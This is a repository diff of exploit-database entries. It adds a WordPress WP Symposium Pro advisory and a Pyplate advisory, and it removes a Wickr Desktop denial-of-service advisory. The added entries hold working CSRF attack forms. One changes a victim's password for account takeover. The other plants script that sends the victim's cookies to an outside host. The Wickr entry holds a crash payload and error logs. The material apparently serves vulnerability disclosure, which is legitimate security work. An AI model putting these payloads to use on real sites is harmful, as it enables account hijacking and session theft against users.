platforms/php/webapps/39202.txt Executable file
View file

@ -0,0 +1,65 @@
#Product : WP Symposium Pro Social Network plugin
#Exploit Author : Rahul Pratap Singh
#Home page Link : https://wordpress.org/plugins/wp-symposium-pro
#Version : 15.12
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 8/Jan/2016
1) XSS Vulnerability:
Vulnerable Code:
file: wps_usermeta_shortcodes.php
"wpspro_country" parameter is not sanitized, that leads to persistent xss.
Video Demonstration:
https://www.youtube.com/watch?v=Xglc3rNZPXs
2) CSRF Vulnerability:
Description:
Edit profile page is vulnerable to CSRF, that allows to change password
which in turn leads to full account takeover.
Exploit:
<html>
<body>
<form action="http://localhost/wp422/wordpress/index.php/edit-profile/"
method="POST" enctype="multipart/form-data">
<input type="hidden" name="wps&#95;usermeta&#95;change&#95;update"
value="yes" />
<input type="hidden" name="wpspro&#95;display&#95;name" value="rahul"
/>
<input type="hidden" name="wpspro&#95;firstname" value="hello1" />
<input type="hidden" name="wpspro&#95;lastname" value="hello2" />
<input type="hidden" name="wpspro&#95;email" value="&#13;" />
<input type="hidden" name="wpsro&#95;home" value="hello4" />
<input type="hidden" name="wpspro&#95;country" value="hello5" />
<input type="hidden" name="wpspro&#95;password" value="asdf" />
<input type="hidden" name="wpspro&#95;password2" value="asdf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Video Demonstration:
https://www.youtube.com/watch?v=sN65HlCRe9c
Fix:
Update to version 16.1
Disclosure Timeline:
reported to vendor : 6/1/2016
vendor response : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016
CVE Number : Not assigned yet

25
platforms/python/webapps/39199.html Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/67610/info
Pyplate is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
Pyplate 0.08 Beta is vulnerable; other versions may also be affected.
<html>
<body>
<form action="http://www.example.com/admin/addScript.py"; method="POST">
<input type="hidden" name="title"
value="<script>new&#32;Image&#40;&#41;&#46;src&#61;"http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;"&#32;encodeURI&#40;document&#46;cookie&#41;&#59;<&#47;script>"
/>
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="&#47;" />
<input type="hidden" name="post" value="<p>bugs<&#47;p>&#13;&#10;" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

234
platforms/windows/dos/35622.txt
View file

@ -1,234 +0,0 @@
Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377
Video:
http://www.vulnerability-lab.com/get_content.php?id=1388
Release Date:
=============
2014-12-25
Vulnerability Laboratory ID (VL-ID):
====================================
1377
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
the data, a practice which is prone to error according to many security experts.
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
(Copy of the Homepage: https://wickr.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
Vulnerability Disclosure Timeline:
==================================
2014-12-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include
special crafted symbole strings
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`-
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
the vulnerability results in an application crash or service shutdown.
Vulnerable Module(s):
[+] friend contacts
[+] wickr password auth
[+] friends
Vulnerbale Input(s):
[+] add friends (name)
[+] wickr password auth
[+] change friend (update name)
Vulnerable Parameter(s):
[+] name (value input)
[+] password (vale input)
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4)
2. Install the wickr windows version of the software to your windows 8 box
3. Create an new account and include the payload to the password input field
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the first issue!
5. We register a new account with regular values
6. Open the friends > add friends section and include the payload to the search input value
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
7. Successful reproduce of the second issue!
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
9. Include in the name values the payload and save the settings
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the third issue!
Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ... ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
Security Risk:
==============
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt